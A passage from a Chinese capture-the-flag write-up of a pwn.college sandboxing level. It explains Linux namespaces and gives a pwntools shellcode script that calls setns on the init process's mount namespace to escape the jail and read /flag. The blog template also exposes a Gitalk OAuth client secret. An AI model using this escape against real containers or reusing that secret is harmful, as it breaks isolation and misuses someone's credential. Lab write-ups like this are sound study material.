<p><code>proc/[pid]/ns</code>是Linux系统中用于表示<strong>某个进程所处的命名空间(namespace)环境。</strong> 这个目录包含了进程<code>pid</code>所在的各类namespace的符号链接。例如，查看进程1234：<code>ls -l /proc/1234/ns</code>。输出的信息可能是：</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">ipc</span>      -&gt;</span> ipc:[<span class="hljs-number">4026531839</span>]<br><span class="hljs-function"><span class="hljs-title">mnt</span>      -&gt;</span> mnt:[<span class="hljs-number">4026531840</span>]<br><span class="hljs-function"><span class="hljs-title">net</span>      -&gt;</span> net:[<span class="hljs-number">4026531992</span>]<br><span class="hljs-function"><span class="hljs-title">pid</span>      -&gt;</span> pid:[<span class="hljs-number">4026531836</span>]<br><span class="hljs-function"><span class="hljs-title">user</span>     -&gt;</span> user:[<span class="hljs-number">4026531837</span>]<br><span class="hljs-function"><span class="hljs-title">uts</span>      -&gt;</span> uts:[<span class="hljs-number">4026531838</span>]<br><span class="hljs-function"><span class="hljs-title">cgroup</span>   -&gt;</span> cgroup:[<span class="hljs-number">4026531835</span>]<br></code></pre></td></tr></table></figure></blockquote>
<p>AI给我的回复，我觉得总结得很好了。</p>
<table>
<thead>
<tr>
<th>命名空间类型</th>
<th>文件路径例子</th>
<th>控制范围</th>
<th>进入后对你的影响</th>
</tr>
</thead>
<tbody><tr>
<td><strong>mnt</strong>（挂载）</td>
<td><code>/proc/1/ns/mnt</code></td>
<td>目录树和挂载点</td>
<td>你会看到另一个系统的目录结构，可能能逃出容器</td>
</tr>
<tr>
<td><strong>net</strong>（网络）</td>
<td><code>/proc/1/ns/net</code></td>
<td>网络设备、接口、IP、端口</td>
<td>你获得了另一个命名空间的网络访问能力（比如 eth0, lo）</td>
</tr>
<tr>
<td><strong>ipc</strong>（进程通信）</td>
<td><code>/proc/1/ns/ipc</code></td>
<td>共享内存、消息队列、信号量</td>
<td>你能与那个 namespace 的进程共享 IPC 资源</td>
</tr>
<tr>
<td><strong>pid</strong>（进程号）</td>
<td><code>/proc/1/ns/pid</code></td>
<td>进程号的可见范围</td>
<td><strong>需要 fork 新进程</strong>，才能在新的 pid namespace 中看到进程号隔离效果</td>
</tr>
<tr>
<td><strong>user</strong>（用户）</td>
<td><code>/proc/1/ns/user</code></td>
<td>UID&#x2F;GID 视图、权限</td>
<td>能让你在 namespace 内成为“root”，但权限不一定能继承出来</td>
</tr>
<tr>
<td><strong>uts</strong>（主机名）</td>
<td><code>/proc/1/ns/uts</code></td>
<td>主机名与域名</td>
<td>会变成目标的 <code>hostname</code>，常用于伪装容器环境</td>
</tr>
<tr>
<td><strong>cgroup</strong>（控制组）</td>
<td><code>/proc/1/ns/cgroup</code></td>
<td>cgroup v2 控制结构</td>
<td>控制资源限制所属组，一般配合容器使用</td>
</tr>
<tr>
<td><strong>time</strong>（时间）</td>
<td><code>/proc/1/ns/time</code></td>
<td>系统时间视图</td>
<td>用于模拟不同的系统时间、时间加速等场景</td>
</tr>
</tbody></table>
<p>那么，我们可以通过用setns切换到<code>/proc/1/ns/mnt</code>，然后访问<code>/flag</code>即可。因为切换到<code>/proc/1</code>的命名空间后，根目录也会相应改变，所以就“逃逸”了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level17&quot;, &quot;/&quot;], &quot;b *main+1782&quot;, close_fds=False)</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level18&quot;</span>, <span class="hljs-string">&#x27;/proc/1/ns/&#x27;</span>], close_fds=<span class="hljs-literal">False</span>)<br><br>shellcode = shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;/data/mnt&#x27;</span>, <span class="hljs-number">0</span>)<br>shellcode += shellcraft.setns(<span class="hljs-string">&#x27;rax&#x27;</span>, <span class="hljs-number">0</span>)<br>shellcode += shellcraft.<span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;/flag&#x27;</span>,<span class="hljs-number">0</span>)<br>shellcode += shellcraft.syscall(<span class="hljs-string">&quot;SYS_sendfile&quot;</span>, <span class="hljs-number">1</span>, <span class="hljs-string">&#x27;rax&#x27;</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x3a</span>)<br>p.send(asm(shellcode))<br>p.interactive()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Pwn/" class="category-chain-item">Pwn</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Pwn/" class="print-no-link">#Pwn</a>
      
        <a href="/tags/pwn-college/" class="print-no-link">#pwn.college</a>
      
        <a href="/tags/kernel/" class="print-no-link">#kernel</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>pwn.college: Sanboxing</div>
      <div>https://loboq1ng.github.io/2025/06/09/pwn-college-Sanboxing/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Lobo Q1ng</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年6月9日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/08/04/Goshawk%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB/" title="Goshawk源码阅读">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Goshawk源码阅读</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/28/oss-fuzz-gen%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB/" title="oss-fuzz-gen源码阅读">
                        <span class="hidden-mobile">oss-fuzz-gen源码阅读</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"Ov23liQFbmwDKuCDRUJV","clientSecret":"ccc29e1700d0ef16f183a840546ac4639ad5fcab","repo":"LoboQ1ng.github.io","owner":"LoboQ1ng","admin":["LoboQ1ng"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":false,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: 'd4b413a513ec5c82d2efdba5dba44fd6'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量
        <span id="busuanzi_value_site_pv"></span>
        次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数
        <span id="busuanzi_value_site_uv"></span>
        人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
